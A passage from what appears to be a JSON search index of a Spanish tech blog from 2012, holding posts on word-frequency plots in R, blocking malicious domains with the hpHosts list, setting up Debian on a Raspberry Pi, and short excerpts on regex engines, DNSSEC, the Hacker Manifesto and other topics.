\u0026gt; word_freq.txt $ wc -l word_freq.txt 26895 word_freq.txt $ head word_freq.txt 7163 the 5448 a 4423 echo 3836 of 3805 to 2555 in 2511 is 2273 and 1794 this 1776 for Una vez más, recurrimos a R para generar la gráfica de la distribución:\n$ R --no-save \u0026lt;\u0026lt; EOF jpeg(\u0026#39;word_freq.jpg\u0026#39;) cmd\u0026lt;-read.table(\u0026#39;word_freq.txt\u0026#39;) par(cex=1.2) plot(log(1:length(cmd[,1])),log(cmd[,1]), pch=20, xlab=\u0026#39;log(Rank)\u0026#39;, ylab=\u0026#39;log(frequency)\u0026#39;) fit\u0026lt;-lm(log(cmd[,1])~log(1:length(cmd[,1]))) abline(fit,lty=2) EOF Este es el resultado:\nAquí la curva es diferente al caso anterior, conforme aumenta el número de palabras distintas decrece su frecuencia de uso. Sin embargo, el texto escogido es un texto escrito en ingles, un texto técnico con ejemplos de código, por lo que tampoco podemos sacar conclusiones sobre el uso del lenguaje, o al menos no en su uso más amplio.\nPara terminar, esta es la distribución que obtenemos del Quijote:\n$ wget http://www.gutenberg.org/cache/epub/2000/pg2000.txt -O quijote-pg2000.txt $ python word-length.py Descargas/quijote-pg2000.txt \u0026gt; quijote_freq.txt $ wc -l quijote_freq.txt 23059 quijote_freq.txt $ head quijote_freq.txt 20626 que 18216 de 18188 y 10363 la 9880 a 8241 en 8210 el 6345 no 4748 los 4707 se $ R --no-save \u0026lt;\u0026lt; EOF jpeg(\u0026#39;quijote_freq.jpg\u0026#39;) cmd\u0026lt;-read.table(\u0026#39;quijote_freq.txt\u0026#39;) par(cex=1.2) plot(log(1:length(cmd[,1])),log(cmd[,1]), pch=20, xlab=\u0026#39;log(Rank)\u0026#39;, ylab=\u0026#39;log(frequency)\u0026#39;) fit\u0026lt;-lm(log(cmd[,1])~log(1:length(cmd[,1]))) abline(fit,lty=2) EOF Curiosamente, se parece bastante a la anterior.\nReferencias » Distribution of Oft-Used Bash Commands » The Project Gutenberg EBook of Don Quijote » Advanced Bash-Scripting Guide\n","permalink":"http://karpoke.ignaciocano.com/2012/06/22/distribucion-de-frecuencias/","summary":"\u003ch2 id=\"distribución-de-los-comandos-más-utilizados\"\u003eDistribución de los comandos más utilizados\u003c/h2\u003e\n\u003cp\u003eUna de esas combinaciones de comandos curiosas es aquella que nos\ndevuelve un listado de los \u003ca href=\"http://www.commandlinefu.com/commands/view/604/list-of-commands-you-use-most-often\"\u003ecomandos más utilizados\u003c/a\u003e ordenados por\nfrecuencia, en este caso limitado a los más frecuentes:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ history | awk \u0026#39;{a[$2]++} END {for (i in a) { print a[i] \u0026#34; \u0026#34; i }}\u0026#39; | sort -rn | head\n62 cd\n50 sudo\n45 vim\n39 ls\n32 ssh\n25 wget\n23 memento.sh\n23 cat\n9 curl\n9 man\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eA partir de estos datos, podemos obtener una \u003ca href=\"http://bayesianbiologist.com/2012/06/01/distribution-of-oft-used-bash-commands/\"\u003edistribución de su\nfrecuencia de uso\u003c/a\u003e en relación al número total de comandos diferentes\nutilizando el paquete estadístico R:\u003c/p\u003e","title":"Distribución de frecuencias"},{"content":"Cuando navegamos por Internet, no somos conscientes de muchas de las conexiones a diferentes dominios que se están llevando a cabo. Desde páginas web que cargan o envían datos a otros dominios nada más visitarlas, hasta casos de phishing o conexiones realizadas por virus o troyanos.\nhpHosts es un proyecto que mantiene una recopilación de dominios cuyo contenido es malicioso, suplanta a otro (phishing), busca estafarnos o está relacionado con spam.\nIncluyendo esta recopilación en nuestro fichero /etc/hosts nos aseguramos de que si una página quiere acceder a alguno de estos dominios no lo consiga, ya que se consulta el archivo /etc/hosts antes de hacer una resolución de dominio.\nDescargamos el archivo y lo descomprimimos:\n$ wget http://support.it-mate.co.uk/downloads/hphosts.zip $ md5sum hphosts.zip 85b34ff1f7803bf6e4a314eaa4f02ac8 $ unzip -d hphosts hphosts.zip $ cd hphosts El fichero comprimido, además del archivo HOSTS.txt, contiene la licencia de usuario, un fichero con información relativa al proyecto y una firma PGP del fichero HOSTS.txt.\nComprobamos la firma:\n$ gpg --verify HOSTS.txt.sig HOSTS.txt gpg: Firmado el dom 20 may 2012 21:35:05 CEST usando clave DSA ID 155DA479 gpg: Imposible comprobar la firma: Clave pública no encontrada Si no puede comprobar la firma porque no tenemos la clave, la importamos:\n$ gpg --recv-keys 155DA479 gpg: solicitando clave 155DA479 de hkp servidor keys.gnupg.net gpg: clave 155DA479: clave pública \u0026#34;Steven Burn \u0026#34; importada gpg: Cantidad total procesada: 1 gpg: importadas: 1 Volvemos a comprobar la firma del fichero HOSTS.txt:\n$ gpg --verify HOSTS.txt.sig HOSTS.txt gpg: Firmado el dom 20 may 2012 21:35:05 CEST usando clave DSA ID 155DA479 gpg: Firma correcta de ;`Steven Burn ;\u0026#39; gpg: AVISO: ¡Esta clave no está certificada por una firma de confianza! gpg: No hay indicios de que la firma pertenezca al propietario. Huellas dactilares de la clave primaria: ECF9 1962 5929 2940 0501 1170 D0D4 353E 155D A479 Vemos que la firma es correcta, aunque no esté certificada por una firma de confianza, por lo que no podríamos asegurar que la firma sea de Steven Burn, pero sí que la firma del fichero pertenece a esa dirección de correo electrónico.\nEn la cabecera del fichero podemos ver la fecha de actualización:\n$ head HOSTS.txt # hpHosts last updated on: 07/06/2012 01:15 # hpHosts last verified by Steven Burn: 01/06/2012 02:00 # # IMPORTANT: Rename this file to \u0026#34;HOSTS\u0026#34; (no .txt extension) # # Support: http://mysteryfcm.co.uk/?mode=contact # http://forum.hosts-file.net # # Download: http://hosts-file.net/?s=Download # Mirrors: http://hosts-file.net/?s=Help#dlmirrors Si tenemos curiosidad, podemos ver que en el archivo hay más de 180K dominios:\n$ grep -c ^127.0.0.1 HOSTS.txt 186434 Por último, adjuntamos el contenido del fichero HOSTS.txt a nuestro /etc/hosts, eliminando antes los retornos de carro \\r que contiene (para que no aparezcan como ^M cuando lo editamos con vim, por ejemplo):\n$ tr -d \u0026#39;\\r\u0026#39; \u0026lt; HOSTS.txt | sudo tee -a /etc/hosts \u0026gt;/dev/null Podemos saber si un sitio ha sido incluido en la lista consultando el catálogo, o utilizando directamente la siguiente URL: http://hosts-file.net/?s=URL, por ejemplo: http://hosts-file.net/?s=www.stackoverflow.com. Y si queremos saber el motivo, en esta otra.\nReferencias » http://hosts-file.net » Protección a nivel local, archivo hosts\n","permalink":"http://karpoke.ignaciocano.com/2012/06/21/hphosts-evitando-la-navegacion-por-dominios-maliciosos/","summary":"\u003cp\u003eCuando navegamos por Internet, no somos conscientes de muchas de las\nconexiones a diferentes dominios que se están llevando a cabo. Desde\npáginas web que cargan o envían datos a otros dominios nada más\nvisitarlas, hasta casos de \u003cem\u003ephishing\u003c/em\u003e o conexiones realizadas por virus\no troyanos.\u003c/p\u003e\n\u003cp\u003ehpHosts es un proyecto que mantiene una recopilación de dominios cuyo\ncontenido es malicioso, suplanta a otro (\u003cem\u003ephishing\u003c/em\u003e), busca estafarnos o\nestá relacionado con \u003cem\u003espam\u003c/em\u003e.\u003c/p\u003e","title":"hpHosts, evitando la navegación por dominios maliciosos"},{"content":" In the history of computer games some games have created and carried whole companies on their shoulders. One of those games is certainly Mario Bros. The Mario character first appeared in the game Donkey Kong and became very famous within its own game series starting with the original Mario Bros. in 1983. Nowadays a lot of spin-offs and 3D jump and runs are being produced centering the Mario character. In this article we will develop a very simple Super Mario clone, which is easily extendible with new items, enemies, heros and of course levels.\nThe code of the game itself will be written in object oriented JavaScript. Now that sounds like a trap since JavaScript is a prototype based scripting language, however, there are multiple object oriented like patterns possible. We will investigate some code which will give us some object oriented constraints. This will be very useful to stay in the same pattern through the whole coding.\n» codeproject.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/21/mario5/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn the history of computer games some games have created and carried\nwhole companies on their shoulders. One of those games is certainly\nMario Bros. The Mario character first appeared in the game Donkey Kong\nand became very famous within its own game series starting with the\noriginal Mario Bros. in 1983. Nowadays a lot of spin-offs and 3D jump\nand runs are being produced centering the Mario character. In this\narticle we will develop a very simple Super Mario clone, which is\neasily extendible with new items, enemies, heros and of course levels.\u003c/p\u003e","title":"Mario5"},{"content":" Historically, regular expressions are one of computer science’s shining examples of how using good theory leads to good programs. They were originally developed by theorists as a simple computational model, but Ken Thompson introduced them to programmers in his implementation of the text editor QED for CTSS. Dennis Ritchie followed suit in his own implementation of QED, for GE-TSS. Thompson and Ritchie would go on to create Unix, and they brought regular expressions with them. By the late 1970s, regular expressions were a key feature of the Unix landscape, in tools such as ed, sed, grep, egrep, awk, and lex.\nToday, regular expressions have also become a shining example of how ignoring good theory leads to bad programs. The regular expression implementations used by today’s popular tools are significantly slower than the ones used in many of those thirty-year-old Unix tools.\nThis article reviews the good theory: regular expressions, finite automata, and a regular expression search algorithm invented by Ken Thompson in the mid-1960s. It also puts the theory into practice, describing a simple implementation of Thompson’s algorithm. That implementation, less than 400 lines of C, is the one that went head to head with Perl above. It outperforms the more complex real-world implementations used by Perl, Python, PCRE, and others. The article concludes with a discussion of how theory might yet be converted into practice in the real-world implementations.\n» Russ Cox | swtch.com/~rsc\n","permalink":"http://karpoke.ignaciocano.com/2012/06/21/regular-expression-matching-can-be-simple-and-fast/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHistorically, regular expressions are one of computer science’s\nshining examples of how using good theory leads to good programs. They\nwere originally developed by theorists as a simple computational\nmodel, but Ken Thompson introduced them to programmers in his\nimplementation of the text editor QED for CTSS. Dennis Ritchie\nfollowed suit in his own implementation of QED, for GE-TSS. Thompson\nand Ritchie would go on to create Unix, and they brought regular\nexpressions with them. By the late 1970s, regular expressions were a\nkey feature of the Unix landscape, in tools such as ed, sed, grep,\negrep, awk, and lex.\u003c/p\u003e","title":"Regular Expression Matching Can Be Simple And Fast"},{"content":" El micro-código corresponde tradicionalmente con la forma más ”pura” de firmware, instrucciones al fin y al cabo, que controlan una máquina. Si no te suenan los términos, puede ser una lectura interesante si quieres conocer cómo funciona un procesador.\nPero no es de hardware de lo que quiero hablar, sino de una forma (curiosa u obvia, de ti depende) de escribir ciertas partes de nuestros programas, que toma la idea básica de las lógicas micro-programadas.\n» genbetadev.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/21/microcodigo-en-mi-codigo/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl micro-código corresponde tradicionalmente con la forma más ”pura”\nde firmware, instrucciones al fin y al cabo, que controlan una\nmáquina. Si no te suenan los términos, puede ser una lectura\ninteresante si quieres conocer cómo funciona un procesador.\u003c/p\u003e\n\u003cp\u003ePero no es de hardware de lo que quiero hablar, sino de una forma\n(curiosa u obvia, de ti depende) de escribir ciertas partes de\nnuestros programas, que toma la idea básica de las lógicas\nmicro-programadas.\u003c/p\u003e","title":"Microcódigo en mi código"},{"content":" Para contactar a otra persona a través de Internet, debe escribir una dirección en su ordenador: un nombre o un número. Esa dirección tiene que ser única para que los ordenadores sepan cómo encontrarse entre sí. ICANN se ocupa de coordinar estos identificadores únicos en todo el mundo. Sin esa coordinación no tendríamos una Internet global. Al escribir un nombre, un sistema debe traducir ese nombre en un número antes de que se pueda establecer la conexión. Ese sistema se denomina Sistema de nombres de dominio (DNS) y traduce nombres como www.icann.org en números, denominados direcciones IP (sigla que corresponde a Protocolo de Internet). ICANN coordina el sistema de direcciones para garantizar que sean únicas.\n» icann.org\n","permalink":"http://karpoke.ignaciocano.com/2012/06/21/dnssec-que-es-y-por-que-es-importante/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePara contactar a otra persona a través de Internet, debe escribir una\ndirección en su ordenador: un nombre o un número. Esa dirección tiene\nque ser única para que los ordenadores sepan cómo encontrarse entre\nsí. ICANN se ocupa de coordinar estos identificadores únicos en todo\nel mundo. Sin esa coordinación no tendríamos una Internet global. Al\nescribir un nombre, un sistema debe traducir ese nombre en un número\nantes de que se pueda establecer la conexión. Ese sistema se denomina\nSistema de nombres de dominio (DNS) y traduce nombres como\n\u003ca href=\"https://www.icann.org\"\u003ewww.icann.org\u003c/a\u003e en números, denominados direcciones IP (sigla que\ncorresponde a Protocolo de Internet). ICANN coordina el sistema de\ndirecciones para garantizar que sean únicas.\u003c/p\u003e","title":"DNSSEC – ¿Qué es y por qué es importante?"},{"content":"En pocas palabras, Raspberry Pi es un ordenador del tamaño de una tarjeta de crédito que puede reproducir vídeo en alta definición (HDMI) y cuesta, dependiendo del modelo, 25$ sin ethernet o 35$ con ethernet [1].\nCuenta con un procesador ARM11 a 700Mhz, 256MB RAM, USB 2.0, conectores de audio y RCA. Se alimenta a través de un puerto mini-USB y tiene una ranura para una tarjeta SD (de hasta 32GB) que es donde se instala el sistema operativo. No tiene WiFi, pero se le puede añadir una antena WiFi USB.\nDiagrama de Paul Beech\nDetrás de este proyecto está la fundación Raspberry Pi [2], una entidad sin ánimo de lucro cuyo objetivo es proporcionar un ordenador sencillo y barato a niños de todo el mundo, enfocado a un uso educacional. Una gran cantidad de voluntarios y otras entidades sin ánimo de lucro se están involucrando en este proyecto. La única pega es que tanto la GPU como su controlador es de código cerrado. Las aplicaciones usan llamadas a unas librerías de código privativo que son las que llaman a su vez al controlador libre incluido en el kernel. La API del driver del kernel es específica para éstas.\nLas primeras unidades se comenzaron a ofrecer a finales de febrero, pero el reducido número de unidades iniciales y la alta demanda han provocado que, por ahora, sólo se pueda comprar una Raspberry Pi por persona, siendo necesario haberse apuntado previamente en lista de espera ya que con cada nueva remesa se sirven según este orden. En mi caso, lo pedí en RS-Online y han pasado unos dos meses hasta que pude hacer el pedido, más otras tres semanas de envío. Hay mucha gente queriendo probarlo :)\nEl pedido básico viene sólo con la placa, ni fuente de alimentación, ni tarjeta SD, ni nada. Todo esto está disponible en RS-Online si queremos, pero realmente no será necesario. Se puede utilizar prácticamente cualquier cargador de móvil con conector mini-USB de fuente de alimentación, que proporcione 5V y, al menos, 700mA para el modelo B (o 300mA en caso del modelo A) [3].\nEn principio, las tarjetas SD de clase 10 son las que tienen un mejor rendimiento de escritura, aunque la diferencia de una marca a otra puede ser importante [4], pero parece ser que hay algunos problemas con algunos modelos concretos [5]. Para estar seguros de que la tarjeta que utilicemos es compatible, así como otros periféricos USB, podemos consultar esta página [6].\nInstalación de debian squeeze Existen varias distribuciones que podremos utilizar como sistema operativo, como fedora, debian o arch, y posiblemente aparecerán más [7]. Debian incluye gcc, Python y algunas aplicaciones de ejemplo. Parece que Ubuntu no va a estar, por ahora, debido a que no da soporte al ARM11 que lleva la placa.\nEn la página de descargas podemos escoger entre las distribuciones adaptadas. Para no sobrecargar el servidor de descargas, podemos descargar el torrent. Si queremos descargar el código fuente, así como las herramientas para compilación cruzada, podemos hacerlo desde la página de GitHub [8].\nUna vez que tengamos la imagen, procederemos a instalarla en la tarjeta SD [9]. El proceso es sencillo. Por ejemplo, para instalar debian, después de haber descargado la imagen, comprobamos que es correcta:\n$ sha1sum ~/debian6-19-04-2012.zip 1852df83a11ee7083ca0e5f3fb41f93ecc59b1c8 debian6-19-04-2012.zip Extraemos la imagen:\n$ unzip debian6-19-04-2012.zip Montamos la tarjeta, si no está montada ya, y anotamos qué nombre tiene el dispositivo:\n$ df | grep mmc /dev/mmcblk0p1 7871488 32 7871456 1% /media/FC30-3DA9 En este caso el sufijo p1 indica que está montada la primera partición, pero nosotros queremos la ruta a la tarjeta, no sólo una partición, ya que la imagen creará las particiones, así que nos quedamos con el nombre mmcblk0. También podría ser que el nombre del dispositivo fuese, por ejemplo, /dev/sdd1, en cuyo caso el 1 es la partición y el nombre del dispositivo sdd.\nDesmontamos la tarjeta SD:\n$ umount /media/FC30-3DA9 Volcamos la imagen en la tarjeta SD:\n$ dd bs=1M if=debian6-19-04-2012/debian6-19-04-2012.img of=/dev/mmcblk0 1859+1 registros leídos 1859+1 registros escritos 1950000000 bytes (2,0 GB) copiados, 151,45 s, 12,9 MB/s Aprovechando todo el espacio de la tarjeta SD La imagen está preparada para una tarjeta de 2 GB, si nuestra tarjeta es de un tamaño mayor, podemos redimensionar las particiones creadas por la imagen para utilizar todo el espacio disponible. Esto lo podríamos hacer directamente desde la debian en Raspberry Pi, pero ahora lo haremos desde el terminal de la Ubuntu.\nUtilizaremos parted con la tarjeta, de 8 GB, aún desmontada:\n$ sudo parted /dev/mmcblk0 (parted) unit chs (parted) print Modelo: SD 00000 (sd/mmc) Disco /dev/mmcblk0: 123119,3,31 Tamaño de sector (lógico/físico): 512B/512B Geometría cilindro,cabeza,sector de BIOS: 123120,4,32. Cada cilindro es 65,5kB. Tabla de particiones. msdos Numero Inicio Fin Tipo Sistema de archivos Banderas 1 16,0,0 1215,3,31 primary fat32 lba 2 1232,0,0 26671,3,31 primary ext4 3 26688,0,0 29743,3,31 primary linux-swap(v1) Aquí vemos las particiones que se han creado tras el volcado de la imagen, y que no se usa el espacio desde el cilindro 29743 hasta el último cilindro 123119.\nLa primera partición es la de arranque (boot). La segunda es la partición de root y será la que aumentaremos todo lo posible. La tercera partición es la swap, que tenemos que mover hasta al final de la tarjeta.\nPara mover la partición de swap, primero debemos calcular el número de cilindro a partir del cual la vamos a poner. Para calcular este número utilizamos la siguiente fórmula:\ninicio = (máximo - (final partición 3 - inicio partición 3) - 1 Por ejemplo:\ninicio = (123119 - ( 29743 - 26688)) - 1 = 120063 Seguimos con parted y la movemos:\n(parted) move 3 120063,0,0 Ahora ampliaremos el tamaño de la partición de root, sin que perdamos los datos en ella:\n(parted) rm 2 (parted) mkpart primary 1232,0,0 120062,3,31 (parted) quit El inicio de la partición de root es el mismo que ya tenía y el último es justo antes del de la partición de swap.\nYa podemos limpiar y redimensionar la partición con e2fsck (como es la segunda añadimos p2):\n$ sudo e2fsck -f /dev/mmcblk0p2 # (permitimos añadir lost-and-found) e2fsck 1.42 (29-Nov-2011) Paso 1: Verificando nodos-i, bloques y tamaños Paso 2: Verificando la estructura de directorios Paso 3: Revisando la conectividad de directorios No se encontró /lost+found. Crear? si Paso 4: Revisando las cuentas de referencia Paso 5: Revisando el resumen de información de grupos /dev/mmcblk0p2: __*** EL SISTEMA DE FICHEROS FUE MODIFICADO ***__ /dev/mmcblk0p2: 59389/101920 files (0.0% non-contiguous), 310435/407040 blocks $ sudo resize2fs /dev/mmcblk0p2 resize2fs 1.42 (29-Nov-2011) Resizing the filesystem on /dev/mmcblk0p2 to 1901296 (4k) blocks. The filesystem on /dev/mmcblk0p2 is now 1901296 blocks long. Sacamos la tarjeta y la introducimos en Raspberry Pi. El usuario por defecto es pi** y la contraseña **raspberry. Esto será lo primero que cambiaremos.\nDespués de instalar debian Tras arrancar por primera vez la Raspberry Pi, una de las primeras acciones que debemos llevar a cabo, sobre todo si pensamos que se pueda acceder desde fuera de la red, es cambiar la contraseña que viene por defecto.\nEjecutamos el comando passwd e introducimos la nueva contraseña.\nLo siguiente, actualizar el sistema:\npi@raspberrypi:~$ sudo apt-get install aptitude pi@raspberrypi:~$ sudo aptitude update \u0026amp;\u0026amp; sudo aptitude safe-upgrade Si nuestro teclado no es inglés, podemos configurarlo para nuestro idioma ejecutando:\npi@raspberrypi:~$ sudo dpkg-reconfigure keyboard-configuration Y para que los cambios tengan efecto:\npi@raspberrypi:~$ sudo setupcon Instalamos algunos paquetes \u0026ldquo;básicos\u0026rdquo;:\npi@raspberrypi:~$ sudo aptitude install byobu htop locate vim vlc Añadimos algunos alias, por ejemplo:\npi@raspberry:~$ cat \u0026gt; .bash_aliases \u0026lt;\u0026lt; EOF alias api=\u0026#34;sudo aptitude install\u0026#34; alias apu=\u0026#34;sudo aptitude update\u0026#34; alias apg=\u0026#34;sudo aptitude safe-upgrade\u0026#34; alias ..=\u0026#34;cd ..\u0026#34; alias vim=\u0026#34;vim.tiny\u0026#34; EOF Si queremos acceder mediante SSH, ya viene con un script que se encarga de arrancar el servidor SSH al inicio. Lo único que tenemos que hacer es renombrar el fichero boot_enable_ssh.rc:\npi@raspberry:~$ sudo mv /boot/boot_enable_ssh.rc /boot/boot.rc Por defecto, la configuración de SSH es demasiado permisiva. Podemos endurecerla, por ejemplo, cambiando el número de puerto en el que escucha el demonio, utilizando claves para conectarnos, impidiento que el usuario root pueda iniciar sesión (PermitRootLogin no), etc.\nReiniciamos el servicio para que los cambios tengan efecto:\npi@raspberry:~$ sudo service ssh restart Antes de cerrar la sesión SSH que tenemos abierta, deberíamos comprobar que podemos acceder de forma remota tras aplicar los cambios, ya que, de lo contrario, nos quedaremos sin poder conectar. Si desde el equipo que nos conectamos, hemos configurado la reutilización de la conexión SSH, estas pruebas se deberán llevar a cabo en otro terminal.\nPor último, si nos vamos a conectar de forma remota, lo mejor sería asignarle una IP estática. Editamos el fichero /etc/network/interfaces y modificamos la configuración de la tarjeta:\nauto eth0 iface eth0 inet static address 192.168.1.51 netmaks 255.255.255.0 gateway 192.168.1.1 broadcast 192.168.1.255 network 192.168.1.0 Reiniciamos el servicio para que los cambios tengan efecto:\npi@raspberry:~$ sudo service networking restart Si queremos arrancar el entorno gráfico LXDE:\npi@raspberrypi:~$ startx Conexión inalámbrica con una antena WIFI USB En mi caso, tengo antena WiFi USB con chip ZyDAS que se necesita configurar.\nConectamos la antena y comprobamos que la reconoce:\npi@raspberrypi:~$ lsusb Bus 001 Device 004: ID 0ace:1211 ZyDAS ZD1211 802.11g El controlador para esta antena no es libre, así que para instalarlo deberemos activar los repositorios non-free. Editamos el fichero /etc/apt/sources.list y la añadimos, para que quede:\ndeb http://ftp.uk.debian.org/debian/ squeeze main non-free Actualizamos los repositorios:\npi@raspberrypi:~$ sudo aptitude update Instalamos el controlador:\npi@raspberrypi:~$ sudo aptitude install zd1211-firmware Si el siguiente comando nos funciona, sólo quedará configurar la conexión:\npi@raspberrypi:~$ sudo iwlist wlan0 scan Conexión WPA2 Si queremos configurar la conexión inalámbrica a una red cifrada con WPA2, lo primero será asegurarnos de que tenemos el paquete necesario:\npi@raspberrypi:~$ sudo aptitude install wpasupplicant Creamos el fichero con el nombre de la red y la contraseña:\npi@raspberrypi:~$ wpa_passphrase MYESSID mypassphrase | sudo tee /etc/wpa_supplicant/wpa_supplicant.conf pi@raspberrypi:~$ sudo chmod 600 /etc/wpa_supplicant/wpa_supplicant.conf Editamos el fichero para añadirle los siguientes campos:\nnetwork { ssid=\u0026#34;MYSSID\u0026#34; #psk=\u0026#34;mypassphrase\u0026#34; psk=ce4d0c6d7585a8432e2205c2b8d2ec5439dab5d9185f4b6f4c41d4120eb36161 proto=RSN # \u0026#34;RSN\u0026#34; para WPA2, \u0026#34;WPA\u0026#34; para WPA key_mgmt=WPA-PSK pairwise=CCMP TKIP # CCMP==AES group=CCMP TKIP } Editamos el fichero de configuración de la red, /etc/network/interfaces, y le asignamos una IP estática, por ejemplo:\nauto wlan0 iface wlan0 inet static address 192.168.1.51 gateway 192.168.1.1 broadcast 192.168.1.255 network 192.168.1.0 wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf Sólo queda reiniciar la red:\npi@raspberrypi:~$ sudo service networking restart Aunque todo parecía ir bien, al final no logro que establecer la conexión. Mirando en los logs he podido encontrar:\npi@raspberrypi:~$ dmesg | grep zd1211rw zd1211rw 1-1.2:1.0: phy0 usbcore: registered new interface driver zd1211rw zd1211rw 1-1.2:1.0: firmware version 4605 zd1211rw 1-1.2:1.0: zd1211 chip 0ace:1211 v4330 high 00-02-e3 RF2959_RF pa0 g---- zd1211rw 1-1.2:1.0: TX-stall detected, reseting device... Parece ser que ese TX-stall detected es debido a que la Raspberry Pi no aporta suficiente potencia para la antena WIFI, por lo que la única solución parece que es utilizar una hub USB con alimentación.\nProyectos relacionados Algunos proyectos que ya están en marcha, relacionados con Raspberry Pi:\nexpEYES: una herramienta, sofware y hardware, para desarrollo y experimentación de proyectos científicos [10] módulo con cámara: un prototipo de cámara que puede ser conectada a Raspberry Pi [11] Raspberry Pi y Arduino: algunos ejemplos [12][13][14] de comunicación entre ambos dispositivos [15] Pwnpi: distribución enfocada a tests de penetración [16] raspbmc: distribución enfocada a utilizar la Raspberry Pi como Media Center [17] Otros enlaces interesantes:\n» Carcasas » Placas de expansión » Periféricos de bajo nivel » Especificaciones de hardware\nReferencias http://www.raspberrypi.org/faqs http://www.raspberrypi.org/about http://www.raspberrypi.org/archives/260 http://www.sakoman.com/OMAP/microsd-card-perfomance-test-results.html http://www.raspberrypi.org/phpBB3/viewtopic.php?f=2\u0026amp;t=4076 http://elinux.org/RPi_VerifiedPeripherals http://www.raspberrypi.org/downloads http://github.com/raspberrypi http://elinux.org/RPi_Easy_SD_Card_Setup http://www.raspberrypi.org/archives/1228 http://www.raspberrypi.org/archives/1254 http://www.doctormonk.com/2012/04/raspberry-pi-and-arduino.html http://www.doctormonk.com/2012/05/gpio-led-blink-from-python-using-slice.html http://omer.me/2012/05/introducing-ponte/ http://www.raspberrypi.org/archives/1171 http://www.pwnpi.com/ http://www.raspbmc.com/about/ ","permalink":"http://karpoke.ignaciocano.com/2012/06/21/raspberry-pi/","summary":"\u003cp\u003eEn pocas palabras, \u003ca href=\"http://www.raspberrypi.org/\"\u003eRaspberry Pi\u003c/a\u003e es un ordenador del tamaño de una\ntarjeta de crédito que puede reproducir vídeo en alta definición (HDMI)\ny cuesta, dependiendo del modelo, 25$ sin \u003cem\u003eethernet\u003c/em\u003e o 35$ con\n\u003cem\u003eethernet\u003c/em\u003e [1].\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Raspi Colour\" loading=\"lazy\" src=\"/images/Raspi_Colour_R-248x300.png\"\u003e\u003c/p\u003e\n\u003cp\u003eCuenta con un procesador ARM11 a 700Mhz, 256MB RAM, USB 2.0, conectores\nde audio y RCA. Se alimenta a través de un puerto mini-USB y tiene una\nranura para una tarjeta SD (de hasta 32GB) que es donde se instala el\nsistema operativo. No tiene WiFi, pero se le puede añadir una antena\nWiFi USB.\u003c/p\u003e","title":"Raspberry Pi"},{"content":" Another one got caught today, it’s all over the papers. ”Teenager Arrested in Computer Crime Scandal”, ”Hacker Arrested after Bank Tampering”\u0026hellip; Damn kids. They’re all alike.\nBut did you, in your three-piece psychology and 1950’s technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world\u0026hellip; Mine is a world that begins with school\u0026hellip; I’m smarter than most of the other kids, this crap they teach us bores me\u0026hellip; Damn underachiever. They’re all alike.\n» phrack.org\n","permalink":"http://karpoke.ignaciocano.com/2012/06/21/the-conscience-of-a-hacker/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAnother one got caught today, it’s all over the papers. ”Teenager\nArrested in Computer Crime Scandal”, ”Hacker Arrested after Bank\nTampering”\u0026hellip;\nDamn kids. They’re all alike.\u003c/p\u003e\n\u003cp\u003eBut did you, in your three-piece psychology and 1950’s technobrain,\never take a look behind the eyes of the hacker? Did you ever wonder\nwhat\nmade him tick, what forces shaped him, what may have molded him?\nI am a hacker, enter my world\u0026hellip;\nMine is a world that begins with school\u0026hellip; I’m smarter than most of\nthe other kids, this crap they teach us bores me\u0026hellip;\nDamn underachiever. They’re all alike.\u003c/p\u003e","title":"The Conscience of a Hacker"},{"content":" La Hackstory es una enciclopedia online que versa sobre la cultura e historia hacker, con especial atención a las iniciativas, grupos, anécdotas y puntos de encuentro hispanos. La estamos creando desde finales del verano de 2008, en nuestro tiempo libre, y ya llevamos entrados unos 200 artículos. Tenemos 18.000 visitas mensuales, 580 al día.\nEn nuestro proyecto, la palabra ”hacker” no es sinónimo de delincuente, sino de persona experta y entusiasta con la tecnología, de alguien muy habilidoso con las herramientas que brindan la informática y las telecomunicaciones. Si quieres saber más, puedes consultar nuestra definición en hackstory.net/index.php/Hacker\nNos gusta especialmente cómo describía a los hackers la genial hacktivista St Jude:\n”Los hackers son los cuerpos de élite de los diseñadores y programadores informáticos. Les gusta verse a sí mismos como los magos y guerreros de la tecnología. Los hackers tienen su propia cultura, con su propio lenguaje. En su tiempo libre, pueden cambiar su ingenuidad por el combate contra enemigos en las Redes, o el paseo a medianoche por sistemas en los que tú no podrías entrar a menos que fueses tan inteligente como ellos. Los hackers del lado oscuro, llamados crackers, se meten en sistemas para robar y destruir, pero la mayoría de hackers están en esto por virtuosismo”.\n» goteo.org\n","permalink":"http://karpoke.ignaciocano.com/2012/06/21/hackstory/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa Hackstory es una enciclopedia online que versa sobre la cultura e\nhistoria hacker, con especial atención a las iniciativas, grupos,\nanécdotas y puntos de encuentro hispanos. La estamos creando desde\nfinales del verano de 2008, en nuestro tiempo libre, y ya llevamos\nentrados unos 200 artículos. Tenemos 18.000 visitas mensuales, 580 al\ndía.\u003c/p\u003e\n\u003cp\u003eEn nuestro proyecto, la palabra ”hacker” no es sinónimo de\ndelincuente, sino de persona experta y entusiasta con la tecnología,\nde alguien muy habilidoso con las herramientas que brindan la\ninformática y las telecomunicaciones. Si quieres saber más, puedes\nconsultar nuestra definición en hackstory.net/index.php/Hacker\u003c/p\u003e","title":"Hackstory"},{"content":" Using an Arduino and an 8x8 matrix display from Adafruit (with I2C backpack), we display all the solutions to the classic 8-Queens problem (see http://en.wikipedia.org/wiki/Eight_queens_puzzle )\nA solution to the 8 Queen problem is where 8 queens are placed on a chess board so that no queen can take any other queen.\n» @stormingrobots | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/21/the-8-queens-problem-with-arduino-and-adafruit-8x8-matrix-display/","summary":"\u003cblockquote\u003e\n\u003cp\u003eUsing an Arduino and an 8x8 matrix display from Adafruit (with I2C\nbackpack), we display all the solutions to the classic 8-Queens\nproblem (see \u003ca 